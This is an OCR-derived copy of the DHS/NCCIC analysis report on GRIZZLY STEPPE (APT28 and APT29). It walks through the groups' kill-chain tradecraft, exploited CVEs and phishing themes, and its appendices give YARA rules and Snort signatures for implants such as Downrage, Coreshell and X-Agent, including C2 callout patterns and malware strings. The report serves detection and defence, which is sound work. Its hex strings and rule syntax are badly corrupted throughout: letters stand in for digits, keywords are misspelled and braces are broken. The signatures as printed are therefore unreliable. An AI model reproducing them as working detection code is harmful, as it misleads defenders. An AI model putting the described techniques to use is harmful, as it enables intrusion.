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Enhanced Analysis of GRIZZLY STEPPE Activity 
Executive Summary 


The Department of Homeland Security (DHS) National Cybersecurity and Communications 
Integration Center (NCCIC) has collaborated with interagency partners and private-industry 
stakeholders to provide an Analytical Report (AR) with specific signatures and recommendations 
to detect and mitigate threats from GRIZZLY STEPPE actors. 
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Recommended Reading about GRIZZLY STEPPE 

DHS recommends reading multiple bodies of work concerning GRIZZLY STEPPE. While DHS 
does not endorse any particular company or their findings, we believe the breadth of literature 
created by multiple sources enhances the overall understanding of the threat. DHS encourages 
analysts to review these resources to determine the level of threat posed to their local network 
environments. 

DHS Resources 

JAR-16-20296 provides technical details regarding the tools and infrastructure used by the 
Russian civilian and military intelligence Services (RIS) to compromise and exploit networks 
and endpoints associated with the U.S. election, as well as a range of U.S. Government, political, 
and private sector entities. JAR-16-20296 remains a useful resource for understanding APT28 
and APT29 use of the cyber kill chain and exploit targets. Additionally, JAR-16-20296 discusses 
some of the differences in activity between APT28 and APT29. This AR primarily focuses on 
APT28 and APT29 activity from 2015 through 2016. 

DHS Malware Initial Findings Report (MIFR)-10105049 UPDATE 2 was updated January 27, 
2017 to provide additional analysis of the artifacts identified in JAR 16-20296. The artifacts 
analyzed in this report include 17 PHP files, 3 executables and 1 RTF file. The PHP files are web 
shells designed to provide a remote user an interface for various remote operations. The RTF file 
is a malicious document designed to install and execute a malicious executable. However, DHS 
recommends that analysts read the MIFR in full to develop a better understanding of how the 
GRIZZLY STEPPE malware executes on a system, which, in turn, downloads additional 
malware and attempts to extract cached passwords. The remaining two executables are Remote 
Access Tools (RATs) that collect host information, including digital certificates and private keys, 
and provide an actor with remote access to the infected system. 

Open Source 

Several cyber security and threat research firms have written extensively about GRIZZLY 
STEPPE. DHS encourages network defenders, threat analysts, and general audiences to review 
publicly available information to develop a better understanding of the tactics, techniques, and 
procedures (TTPs) of APT28 and APT29 and to potentially mitigate against GRIZZLY STEPPE 
activity. 

The below examples do not constitute an exhaustive list. The U.S. Government does not endorse 
or support any particular product or vendor. 


2 of 56 


TLP:WHITE 









TLP:WHITE 


Source 

Title 

Group 

Crowdstrike 

Bears in the Midst: Intrusion into the DNC 

APT28/2 

9 

ESET 

En Route with Sednit version 1.0 

APT28 

ESET 

Visiting The Bear Den 

APT28 

FireEye 

APT28: A Window Into Russia's Cyber Espionage Operations? 

APT28 

FireEye 

HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat 

Group 

APT29 

FireEye 

APT28: At the Center of the Storm - Russia strategically evolves its 
cyber operations 

APT28 

F-Secure 

BlackEnergy & Quedagh the convergence of crimeware and APT 
attacks, TLP: WHITE 

APT28 

F-Secure 

The Dukes 7 years of Russian cyberespionage 

APT29 

F-Secure 

COSMICDUKE: Cosmu with a twist of MiniDuke 

APT29 

F-Secure 

OnionDuke: APT Attacks Via the Tor Network 

APT29 

F-Secure 

COZYDUKE 

APT29 

Kaspersky 

Sofacy APT hits high profile targets with updated toolset 

APT28 

Crysys 

Miniduke: Indicators 

APT29 

Palo Alto 
Networks 

‘DealersChoice’ is Sofacy’s Flash Player Exploit Platform 

APT28 

Palo Alto 
Networks 

Sofacy’s ‘Komplex’ OS X Trojan 

APT28 

Palo Alto 
Networks 

The Dukes R&D Finds a New Anti-Analysis Technique - Palo Alto 
Networks Blog 

APT29 

Palo Alto 
Networks 

Tracking MiniDionis: CozyCar’s New Ride Is Related to Seaduke 

APT29 

PwC 

APT28: Sofacy? So-funny 

APT28 

PwC 

Cyber Threat Operations: Tactical Intelligence Bulletin - Sofacy 

Phishing 

APT28 

Securelist 

The CozyDuke APT 

APT29 

Secu reworks 

Threat Group-4127 Targets Hillary Clinton Presidential Campaign 

APT28 

ThreatConnect 

ThreatConnect and Fidelis Team Up to Explore the DCCC Breach 

APT28 

ThreatConnect 

ThreatConnect follows Guccifer 2.0 to Russian VPN Service 

APT28 

ThreatConnect 

ThreatConnect Identifies Additional Infrastructure in DNC Breach 

APT28/2 

9 

ThreatConnect 

Belling the BEAR 

APT28 

ThreatConnect 

Can a BEAR Fit Down a Rabbit Hole? 

APT28 

Trend Micro 

Operation Pawn Storm Using Decoys to Evade Detection 

APT28 

Trend Micro 

Pawn Storm Ramps Up Spear-phishing Before Zero-Days Get 

Patches 

APT28 

Volexity 

PowerDuke: Widespread Post-Election Spear Phishing Campaigns 
Targeting Think Tanks and NGOs 

APT29 

Trend Micro 

Operation Pawn Storm: Fast Facts and the Latest Developments 

ATP 29 

ESET 

En Route with Sednit - Part 2: Observing the Comings and Goings 

ATP 28 
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Utilizing Cyber Kill Chain for Analysis 


DHS analysts leverage the Cyber Kill Chain model to analyze, discuss, and dissect malicious 
cyber activity. The phases of the Cyber Kill Chain are Reconnaissance, Weaponization, 

Delivery, Exploitation, Installation, Command and Control, and Actions on the Objective. This 
section will provide a high-level overview of GRIZZLY STEPPE activity within this framework. 

Reconnaissance 

GRIZZLY STEPPE actors use various reconnaissance methods to determine the best attack 
vector for compromising their targets. These methods include network vulnerability scanning, 
credential harvesting, and using “doppelganger” (also known as “typo-squatting”) domains to 
target victim organizations. The doppelganger domains can be used for reconnaissance when 
users incorrectly type in the web address in a browser or as part of delivery as a URL in the body 
of a phishing emails. DHS recommends that network defenders review and monitor their 
networks for traffic to sites that look similar to their own domains. This can be an indicator of 
compromise that should trigger further research to determine whether a breach has occurred. 
Often, these doppelganger sites are registered to suspicious IP addresses. For example, a site 
pretending to be an organization’s User Log In resolving to a TOR node IP address may be 
considered suspicious and should be researched by the organization’s security operations center 
(SOC) for signs of users navigating to that site. Because these doppelganger sites normally 
mimic the targeted victim’s domain, they were not included in IAR-16-20296. 

Before the 2016 U.S. election, DHS observed network scanning activity that is known as 
reconnaissance. The IPs identified performed vulnerability scans attempting to identify websites 
that are vulnerable to cross-site scripting (XSS) or Structured Query Language (SQL) injection 
attacks. When GRIZZLY STEPPE actors identify a vulnerable site, they can then attempt to 
exploit the identified vulnerabilities to gain access to the targeted network. Network perimeter 
scans are often a precursor to network attacks and DHS recommends that security analysts 
identify the types of scans carried out against their perimeters. This information can aid security 
analysts in identifying and patching vulnerabilities in their systems. 

Another common method used by GRIZZLY STEPPE is to host credential-harvesting pages as 
seen in Step 4 and Step 5 of the GRIZZLY STEPPE attack lifecycle graphic. This technique 
includes hosting a temporary website in publicly available infrastructure (i.e., neutral space) that 
users are directed to via spear-phishing emails. Users are tricked into entering their credentials in 
these temporary sites, and GRIZZLY STEPPE actors gain legitimate credentials for users on the 
targeted network. 
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Weaponization 

GRIZZLY STEPPE actors have excelled at embedding malicious code into a number of file 
types as part of their weaponization efforts. In 2014, it was reported that GRIZZLY STEPPE 
actors were wrapping legitimate executable files with malware (named “OnionDuke”) to 
increase the chance of bypassing security controls. Since weaponization actions occur within the 
adversary space, there is little that can be detected by security analysts during this phase. APT28 
and APT29 weaponization methods have included: 

• Code injects in websites as watering hole attacks 

• Malicious macros in Microsoft Office files 

• Malicious Rich Text Format (RTF) files with embedded malicious flash code 

Delivery 

As described in JAR-16-20296 and numerous publicly available resources, GRIZZLY STEPPE 
actors traditionally use spear-phishing emails to deliver malicious attachments or URLs that lead 
to malicious payloads. DHS recommends that network defenders conduct analysis of their 
systems to identify potentially malicious emails involving variations on GRIZZLY STEPPE 
themes. Inbound emails subjects should be reviewed for the following commonly employed 
titles, text, and themes: 

• efax, e-Fax, efax #100345 (random sequence of numbers) 

• PDF, PFD, Secure PDF 

• Topics from current events (e.g., “European Parliament statement on...”) 

• Fake Microsoft Outlook Web Access (OWA) log-in emails 

• Invites for cyber threat events 

Additionally, GRIZZLY STEPPE actors have infected pirated software in torrent services and 
leveraged TOR exit nodes to deliver to malware since at least 2014. These actors are capable of 
compromising legitimate domains and services to host and deliver malware in an attempt to 
obscure their delivery methods. DHS notes that the majority of TOR traffic is not GRIZZLY 
STEPPE activity. The existence of a TOR IP in a network log only indicates that network 
administrators should review the related traffic to determine if it is legitimate activity for that 
specific environment. 

Exploitation 

GRIZZLY STEPPE actors have developed malware to exploit a number of Common 
Vulnerability and Exposures (CVEs). DHS assesses that these actors commonly target Microsoft 
Office exploits due to the high likelihood of having this software installed on the targeted hosts. 
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While not all-encompassing, the following CVEs have been targeted by GRIZZLY STEPPE 
actors in past attacks. 

• CVE-2016-7855 : Adobe Flash Player Use-After-Free Vulnerability 

• CVE-2016-7255 : Microsoft Windows Elevation of Privilege Vulnerability 

• CVE-2016-4117 : Adobe Flash Player Remoted Attack Vulnerability 

• CVE-2015-1641 : Microsoft Office Memory Corruption Vulnerability 

• CVE-2015-2424 : Microsoft PowerPoint Memory Corruption Vulnerability 

• CVE-2014-1761 : Microsoft Office Denial of Service (Memory Corruption) 

• CVE-2013-2729 : Integer Overflow in Adobe Reader and Acrobat vulnerability 

• CVE-2012-0158 : ActiveX Corruption Vulnerability for Microsoft Office 

• CVE-2010-3333 : RTF Stack Buffer Overflow Vulnerability for Microsoft Office 

• CVE-2009-3129 : Microsoft Office Compatibility Pack for Remote Attacks 

Installation 

GRIZZLY STEPPE actors have leveraged several different types of implants in the past. 

Analysts can research these implants by reviewing open-source reporting on malware families 
including Sofacy, and Onion Duke. Recently, DHS analyzed 17 PHP files, 3 executables, and 1 
RTF file attributed to GRIZZLY STEPPE actors and the findings are located in MIFR- 
10105049-Update2 (updated on 1/26/2017). The PHP files are web shells designed to provide a 
user interface for various remote operations. The RTF file is a malicious document designed to 
install and execute a malicious executable. DHS recommends that security analysts review their 
systems for unauthorized web shells. 

Command and Control 

GRIZZLY STEPPE actors leverage their installed malware through Command and Control (C2) 
infrastructure, which they traditionally develop via compromised sites and publicly available 
infrastructure, such as TOR. C2 IOCs are traditionally the IP addresses or domains that are 
leveraged to send and receive commands to and from malware implants. 

Actions on the Objective 

GRIZZLY STEPPE actors have leveraged their malware in multiple campaigns with various end 
goals. GRIZZLY STEPPE actors are capable of utilizing their malware to conduct extensive data 
exfiltration of sensitive files, emails, and user credentials. Security operation center (SOC) 
analysts may be able to detect actions on the objective before data exfiltration occurs by looking 
for signs of files and user credential movement within their network. 


6 of 56 


TLP:WHITE 

















TLP:WHITE 


Detection and Response 


The appendixes of this Analysis Report provide detailed host and network signatures to aid in 
detecting and mitigating GRIZZLY STEPPE activity. This information is broken out by actor 
and implant version whenever possible. MIFR-10105049 UPDATE2 provides additional YARA 
rules and IOCs associated with APT28 and APT29 actors. 

Contact Information 


Recipients of this report are encouraged to contribute any additional information that they may 
have related to this threat. For any questions related to this report, please contact NCCIC at: 

Phone: +1-703-235-8832 

Email: ncciccustomerservice@hq.dhs.gov 

Feedback 


DHS strives to make this report a valuable tool for our partners and welcome feedback on how 
this publication could be improved. You can help by answering a few short questions about this 
report at the following URL: https://www.us-cert.gov/forms/feedback 
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APPENDIX A: APT28 


This section describes six implants associated with APT28 actors. Included are YARA rules as 
well as SNORT signatures. Despite the use of sound production rules, there is still the chance for 
false positives. In addition, these will complement additional analysis and should not be used as 
the sole source of attribution. 

The following YARA rules detect Downrage, referred to as IMPLANT 1 with rule naming 
convention. These rules will also detect X-AGENT/CHOPSTICK, which shares characteristics 
with DOWNRAGE. 

Rule IMPLANT_l_vl 


strings: 

$STR1 = {6A ?? E8 ?? ?? FF FF 59 85 CO 74 OB 8B C8 E8 ?? ?? FF FF 8B FO EB 02 33 F6 8B CE 
E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56 E8 ?? ?? FF FF 59} 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_l_v2 


strings: 


$STR1 = {83 3E 00 53 74 4F 8B 46 04 85 CO 74 48 83 CO 02 50 E8 ?? ?? 00 00 8B D8 59 85 DB 74 
38 8B 4E 04 83 F9 FF 7E 21 57 } 

$STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 CO EB IB 8B 49 04 8B 04 81 80 78 19 01 75 0D 
FF 70 10 FF [5] 85 CO 74 E3 } 


condition: 


(uintl6(0) == 0x5 A4D) and any of them 
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Rule IMPLANT_l_v3 


strings: 

$rol7encode = { OF B7 C9 Cl CO 07 83 C2 02 33 Cl OF B7 OA 47 66 85 C9 75 } 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) = OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 


Rule IMPLANT_l_v4 


strings: 

$XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ?? ?? ?? 32 04 OF 46 
88 01 3B 75 OC 7C EO } 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_l_v5 


strings: 

$drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77 [5] 6A 69 [5] 6A 6E [5] 
6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 } 

$mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C 36 7A C7 45 ?? 73 71 
33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 } 

condition: 


(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and any of them 
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} 

Rule IMPLANT_l_v6 

{ 

strings: 

$XORopcodes_eax = { 35 (22 07 15 0el56 d7 a7 0a) } 

$XORopcodes_others = { 81 (f 1 If2If3If4lf5If6If7) (22 07 15 Oel56 d7 a7 Oa) } 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) = OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025) and any of them 

} 

Rule IMPLANT_l_v7 

{ 

strings: 

$XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF } 
condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Network Indicators for Implant 1 

alert tcp $HOME_NET any -> $EXTERNAE_NET $HTTP_PORTS (msg:"Downrage_HTTP_C2"; 
flow:established,to_server; content:"POST"; http_method; content:"="; content:"=l20IHTTP/l.l"; 
fast_pattern; distance:19; within:10; pcre:'7 A V(?:[a-zA-Z0-9]{2,6}V){2,5}[a-zA-Z0-9]{ l,7}\.[A-Za-zO- 
9\+\-\_\.]+V\?[a-zA-Z0-9]{ l,3}=[a-zA-Z0-9+V]{ 19 }=$/I";) 

The following YARA rules detect CORESF1EEE/SOURFACE, referred to as IMPEANT 2 with rule 
naming convention. 


IMPLANT 2 Rules: 
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Rule IMPLANT_2_vl 


strings: 

$STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01} 
condition: 

(uintl6(0) == 0x5 A4D) and all of them 

} 


Rule IMPLANT_2_v2 


strings: 

$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 
4? [1-2] 01} 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_2_v3 


strings: 

$STR1 =[cleb078d??01321c??33d2] 

$STR2 = {2b??83??060f83??000000eb0233} 

$STR3 = {89????89????8955??8945??3b??0f83??0000008d????8d????fe] 
condition: 

(uintl6(0) == 0x5 A4D) and any of them 

} 
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Rule IMPLANT_2_v4 


strings: 

$STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 
C5 50 8D 45 FO 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27} 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_2_v5 


strings: 

$STR1 = [48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15 
[2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8} 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_2_v6 


strings: 

$STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F ?? [1-2] 00 01 00 00 7F ?? 
[1-2] 80 00 00 00 7F ?? 83 ?? 40 7F[ 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_2_v7 
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strings: 

$STR1 = {0a0fafd833d28d41fff775?? 

8b450ccleb078d7901321c0233d28bc7895de4bb06000000f7f38b450c8d59fe025dff321c028bcl33d2b90 

6000000f7fl8b450c8bcf221c028b45e48b55e008d41fe83f8068b45??72??8b4d??8b} 

$STR2 = {8d9b000000000fb65c0afe8d34028b45?? 
03c20fafd88d7a018d42ff33d2f775??cleb078bc7321c0a33d2b906000000f7fl8a4d?? 

8b450c80e902024d??320c028b45??33d2f7757? 

8b450c220c028bd702d9301e8b4d0c8d42fe3b45e88b45??8955??72a05f5e5b8be55dc20800} 

condition: 

(uint!6(0) == 0x5 A4D) and any of them 


Rule IMPLANT_2_v8 


strings: 

$STR1 = {8b??448944246041f7e08bf2b8abaaaaaaclee0289742458448b??41f7?? 
8bcaba03000000c 1 e902890c248d044903c0442b??4489??24043bf 1 Of 83 ??0100008d 1 c764c 896c24} 
$STR2 = {c541f7e0????????????8d0c5203c92bcl8bc8??8d04??460fb60c?? 
4002c7418d48ff4432c8b8abaaaaaaf7elclea028d045203c02bc8b8abaaaaaa46220c?7 
418d48fef7elclea028d045203c02bc88bcl} 

$STR3 = {41f7e0clea02418bc08d0c5203c92bcl8bc8428d041b460fb60c?7 
4002c6418d48ff4432c8b8abaaaaaaf7elclea028d045203c02bc8b8abaaaaaa} 

$STR4= {46220c?? 

418d48fef7elclea028d04528b54245803c02bc88bcl0fb64fff420fb60477410fafcbcl} 
condition: 

(uintl6(0) == 0x5 A4D) and any of them 

} 
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Rule IMPLANT_2_v9 


strings: 

$STR1 = { 8A C3 02 CO 02 D8 8B 45 F8 02 DB 83 Cl 02 03 45 08 88 5D OF 89 45 E8 8B FF OF 
B6 5C OE FE 8B 45 F8 03 Cl OF AF D8 8D 51 01 89 55 F4 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 
45 F4 Cl EB 07 32 1C 32 33 D2 F7 F7 8A Cl 02 45 OF 2C 02 32 04 32 33 D2 88 45 FF 8B Cl 8B F7 F7 
F6 8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE 3B D7 72 A4 8B 45 E4 
8B 7D EO 8B 5D FO 83 45 F8 06 43 89 5D FO 3B D8 OF 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 
03 CO 2B F8 EB 09 33 C9 E9 5B FF FF FF 33 FF 3B 7D EC OF 83 ?? ?? ?? ?? 8B 55 08 8A CB 02 C9 
8D 04 19 02 CO 88 45 13 8D 04 5B 03 CO 8D 54 10 FE 89 45 EO 8D 4F 02 89 55 E4 EB 09 8D 9B 00 00 
00 00 8B 45 EO OF B6 5C 31 FE 8D 44 01 FE OF AF D8 8D 51 01 89 55 OC 33 D2 BF 06 00 00 00 8D 
41 FF F7 F7 8B 45 OC Cl EB 07 32 1C 32 33 D2 F7 F7 8A Cl 02 45 13 2C 02 32 04 32 33 D2 88 45 OB 
8B Cl 8B F7 F7 F6 8A 45 OB 8B 75 14 22 04 32 02 D8 8B 45 E4 30 1C 01 8B 4D OC } 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) = 0x6674725C) and all of them 

} 


Rule IMPLANT_2_vlO 


strings: 

$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 
4? [1-2] 01} 


condition: 

(uint 16(0) == 0x5 A4D) and all of them 


Rule IMPLANT_2_vl 1 


strings: 
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$STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 
C5 50 8D 45 FO 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27} 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_2_vl2 


strings: 

$STR1 = [48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15 
[2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8} 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_2_vl3 


strings: 

$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 
4? [1-2] 01} 

condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Rule IMPLANT_2_vl4 


strings: 
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$STR1 = 

{8b??448944246041f7e08bf2b8abaaaaaaclee0289742458448b??41f7??8bcaba03000000cle902890c248 
d044903c0442b?74489??24043bfl0f83??0100008dlc764c896c24 } 

$STR2 = 

{c541f7e0????????????8d0c5203c92bcl8bc8??8d04??460fb60c??4002c7418d48ff4432c8b8abaaaaaaf7e 
Iclea028d045203c02bc8b8abaaaaaa46220c??418d48fef7elclea028d045203c02bc88bcl} 

$STR3 = 

{41f7e0clea02418bc08d0c5203c92bc 18bc8428d04 Ib460fb60c??4002c6418d48ff4432c8b8abaaaaaaf7e 1 
clea028d045203c02bc8b8abaaaaaa} 

$STR4 = 

{46220c?7418d48fef7elclea028d04528b54245803c02bc88bcl0fb64fff420fb604??410fafcbcl} 
condition: 

(uintl6(0) == 0x5 A4D) and any of them 


Rule IMPLANT_2_vl5 


strings: 

$XOR_LOOPl = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 } 
$XOR_FOOP2 = { 32 1C 02 8B Cl 33 D2 B9 06 00 00 00 F7 FI } 

$XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 } 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 


Rule IMPLANT_2_vl6 


strings: 
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$OBF_FUNCT = { OF B6 1C OB 8D 34 08 8D 04 OA OF AF D8 33 D2 8D 41 FF F7 75 F8 8B 45 
OC Cl EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 OC 8D 59 FE 02 
5D FF 32 1C 02 8B Cl 33 D2 B9 06 00 00 00 F7 FI 8B 45 OC 8B CF 22 1C 02 8B 45 E4 8B 55 EO 02 
C3 30 06 8B 5D FO 8D 41 FE 83 F8 06 8B 45 DC 72 9A } 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and $OBF_FUNCT 

} 


Rule IMPLANT_2_vl7 


strings: 

$STR1 = { 24108b44241c894424148b4424246836 } 
$STR2 = { 518d4ddc516a018bd08b4de4e8360400 } 
$STR3 = { e4817806159Idf75740433f6ebla8b48 } 
$STR4 = { 33d2f775f8 8b45d402d903c641321 c3a } 
$STR5 = { 006a0056ffd083f8ff74646a008d45f8 } 
condition: 

(uint 16(0) == 0x5 A4D) and 2 of them 


Rule IMPLANT_2_vl8 


strings: 

$STR1 = { 8A Cl 02 CO 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 OC 88 5D FF 8B 5D EC 83 C2 
FE 03 D8 89 55 EO 89 5D DC 8D 49 00 03 Cl 8D 34 OB OF B6 1C OA OF AF D8 33 D2 8D 41 FF F7 75 
F4 8B 45 OC Cl EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 OC 8D 
59 FE 02 5D FF 32 1C 02 8B Cl 33 D2 B9 06 00 00 00 F7 FI 8B 45 OC 8B CF 22 1C 02 8B 45 E4 8B 
55 EO 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45 F8 72 9B 8B 4D FO 8B 5D D8 8B 7D 08 8B FO 
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41 83 C6 06 89 4D F0 89 75 F8 3B 4D D4 OF 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 CO 2B 
F8 EB 02 33 FF 3B FA OF 83 ?? ?? ?? ?? 8B 5D EC 8A Cl 02 CO 83 C3 FE 8D 14 08 8D 04 49 02 D2 03 
CO 88 55 OB 8D 48 FE 8D 57 02 03 C3 89 4D D4 8B 4D OC 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 
00 OF B6 5C OA FE 8D 34 02 8B 45 D4 03 C2 OF AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 Cl EB 07 
8B C7 32 1C OA 33 D2 B9 06 00 00 00 F7 FI 8A 4D F8 8B 45 OC 80 E9 02 02 4D OB 32 OC 02 8B 45 
F8 33 D2 F7 75 F4 8B 45 OC 22 OC 02 8B D7 02 D9 30 IE 8B 4D OC 8D 42 FE 3B 45 E8 } 


condition: 

(uintl6(0) == 0x5A4D or uintl6(0) = OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 


Rule IMPLANT_2_vl9 


strings: 

$obfuscated_RSAl = { 7C 41 B4 DB ED BO B8 47 FI 9C A1 49 B6 57 A6 CC D6 74 B5 52 12 4D 
FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2 E3 7B IE B8 09 3C AF 76 A1 38 56 76 
BB AO 63 B6 9E 5D 86 E4 EC BO DC 89 IE FA 4A E5 79 81 3F DB 56 63 IB 08 OC BF DC FC 75 19 
3E IF B3 EE 9D 4C 17 8B 16 9D 99 C3 OC 89 06 BB FI 72 46 7E F4 OB F6 CB B9 C2 11 BE 5E 27 94 
5D 6D CO 9A 28 F2 2F FB EE 8D 82 C7 OF 58 51 03 BF 6A 8D CD 99 F8 04 D6 F7 F7 88 OE 51 88 B4 
El A9 A4 3B } 

$cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01 00 01 00 AF BD 26 C9 
04 65 45 9F OE 3F C4 A8 9A 18 C8 92 00 B2 CC 6E OF 2F B2 71 90 FC 70 2E OA FO CA AA 5D F4 CA 
7A 75 8D 5F 9C 4B 67 32 45 CE 6E 2F 16 3C FI 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC 
C7 30 B2 9E OB 90 F8 B2 94 90 ID 52 B5 2F F9 8B E2 E6 C5 9A OA IB 05 42 68 6A 3E 88 7F 38 97 
49 5F F6 EB ED 9D EF 63 FA 56 56 OC 7E ED 14 81 3A ID B9 A8 02 BD 3A E6 EO FA 4D A9 07 5B 
E6 } 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) = 0x6674725C) and any of them 

} 

Rule IMPLANT_2_v20 


strings: 
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$func = { OF B6 5C OA FE 8D 34 02 8B 45 D4 03 C2 OF AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 
F4 Cl EB 07 8B C7 32 1C OA 33 D2 B9 06 00 00 00 F7 FI 8A 4D F8 8B 45 OC 80 E9 02 02 4D OB 32 
OC 02 8B 45 F8 33 D2 F7 75 F4 8B 45 OC 22 OC 02 8B D7 02 D9 30 IE 8B 4D OC 8D 42 FE 3B 45 E8 
8B 45 D8 89 55 F8 72 AO } 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 

} 


Network Indicators for Implant 2 


alert tcp $HOME_NET any -> $EXTERNAF_NET $HTTP_PORTS 

(msg:"Coreshell_F[TTP_CALLOUT"; flow:established,to_server; content:"POST"; http_method; 
content:"User-Agent: MSIE fast_pattern:only; pcre:"/User-Agent: MSIE [89]\.0\x0d\x0a/D"; 
pcre:"/ A V(?:checklupdatelstorelinfo)V$/I";) 

The following YARA rules detect X-Agent/CHOPSTICK, referred to as IMPFANT 3 with rule naming 
convention. 


IMPFANT 3 Rules: 

Rule IMPLANT_3_vl 

{ 

strings: 

$STR1 = ">process isn't exist<" ascii wide 

$STR2 = "shell\\open\\command=\"System Volume InformationWUSBGuard.exeV install" ascii 

wide 

SSTR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 
Firefox/20.0" ascii wide 

$STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide 

$STR5 = {Of b6 14 31 88 55 ?? 33 d2 8b cl f7 75 ?? 8b 45 ?? 41 0fb6 14 02 8a 45 ?? 03 fa} 
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condition: 
any of them 


Rule IMPLANT_3_v2 


strings: 

$base_key_moved = {Cl 45 ?? 3B C6 73 OF C7 45 ?? 8B 07 85 CO C7 45 ?? 74 02 FF DO C7 45 ?? 
83 C7 04 3B C7 45 ?? FE 72 FI 5F C7 45 ?? 5E C3 8B FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 
C7 45 ?? B1 D1 FF FF C7 45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45 ?? 
33 35} 

